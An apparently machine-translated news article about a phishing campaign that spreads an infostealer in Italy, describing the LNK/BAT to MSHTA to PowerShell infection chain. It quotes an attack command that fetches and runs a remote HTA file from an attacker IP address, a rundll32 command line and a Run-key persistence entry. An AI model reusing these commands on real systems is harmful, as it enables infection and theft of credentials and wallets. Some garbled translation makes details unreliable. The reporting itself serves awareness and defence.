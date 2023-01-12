A new malware attack campaign has come under scrutiny that targets Italy with phishing emails designed to distribute a Infostealers (literally “information thief”) on compromised Windows systems.

How this malware attack works and what damage it can cause

“Infostealer malware steals sensitive information such as system information, digital wallet [tipo di criptovalute, per capirci]browser histories, cookies, and encrypted wallet credentials from victim devices“, he has declared in a relationship security researcher Karthickkumar Kathiresan, of cybersecurity firm Uptycs.

The details of the campaign were disclosed for the first time by the Milan-based IT services company, the SI.net company precisely, last month.

The multi-stage infection sequence begins with an invoice-themed phishing email (with a fake invoice, of course) containing a link that, when clicked, downloads a password-protected ZIP archive file, which houses two files : a shortcut file (with the .LNK extension) and a batch file (with the .BAT extension) file.

Regardless of which file is launched, the attack pattern remains the same, as opening the shortcut (.INK) file fetches the same batch script (.BAT extension file) designed to install the information stealer payload from a GitHub repository ; this is achieved by exploiting a legitimate PowerShell binary file that can even be found from GitHub.

Once installed, the C# programming language-based malware collects system metadata and various information from web browsers (e.g., cookies, bookmarks, credit cards, downloads, and credentials), as well as various cryptocurrency wallets (if present, for example the Brave browser has one), which are all transmitted to who knows who, to an attacker who knows where in the world.

Technical analysis of the malware attack

After a user executes the .lnk file from the zipped folder, he starts powershell.exe (heir to the famous windows prompt) and tries to execute the script file directly from the url using MSHTA extensiona special Windows executable function.

What is written to PowerShell and then executed is:

“C:WindowsSystem32mshta.exe” http://116.203.19.97/1/lib32.hta

The VBScript, which starts via the web page activated by MSHTA, decrypts all the contents in memory and proceeds with the execution of PowerShell commands which download two files, which are released in the root of %ProgramData%

These two files are:

An image file (image.png), launched by rundll32.exe ending in the path below:

“C:WindowsSystem32rundll32.exe” “C:Program FilesWindows Photo ViewerPhotoViewer.dll”, ImageView_Fullscreen C:ProgramDataimage.png

The second, but not least, a .BAT file: (Fattura_IT9032003.bat)

After that, a copy of start.exe is dropped in the root of the system32 folder and the file name is changed to Fattura_IT9032003.bat.exe and the file attribute is changed to invisible.

Subsequently, Fattura_IT9032003.bat.exe starts execution with the command line and contains a Base64-encoded payload. During execution, it decrypts the data and gets the gzip-decompressed code into memory.

This code made by this malware attack helps to decompress the data when needed.

Finally, start.exe downloads the binary payloads from github which are dropped in %appdata%Roamingwininfo64lib32.exe

lib32.exe is just a 64-bit executable binary compiled in C#. This binary file contains compressed data in the resource section. which is decompressed during its execution.

The data in virtual memory address (0x78400) contains a new DLL binary (Ejefqnxog.dll)

Along with these, this malware attack also creates this autostart entry:

HKU SOFTWAREMicrosoftWindowsCurrentVersionRunEAC_Update: “C:Users AppDataRoamingwininfo64lib32.exe”

Ejefqnxog.dll is a 64-bit binary Dll file compiled in C#. which during its execution causes all the encrypted contents to be subsequently decrypted and moved to read the data of the unfortunate user.

Infostealer malware tries to collect some sensitive information from victims’ computers.

Various personal (and other) information is collected during the malware attack.

Prevention is better than cure

Obviously it’s not that the computer wakes up one morning and decides to let plague and horns inside it, but surprise! The .ink files must first be downloaded and then clicked or they won’t start.

Talking about a “malware attack” would actually be improper, because even these damages depend on the user’s habits.

Unfortunately, our country has been affected because in addition to the carelessness and disinformation rampant in computer science, many people use very dangerous software such as Windows KMSswhich are admittedly made of malicious code.

Windows licenses are very cheap these days on Amazon and third-party resellers; if by hypothesis you bought one in 2016 for Windows 7, you switched to Windows 10 (because Microsoft allows it) and you “passed” the license and if by pure hypothesis you are lucky enough to have a PC compatible with Windows 11, what Is it necessary to risk personal data in order not to spend €20 on a licence?

Unfortunately, the “vice” of not paying because one thinks one is cheating and “cheating the system”, is paid for much more than in cash; many cracks circulating on the net today are the antithesis of computer security, there is little you can do.

Unfortunately the average Windows user makes several mistakes that at best slow down the operating system, at worst require a reinstall.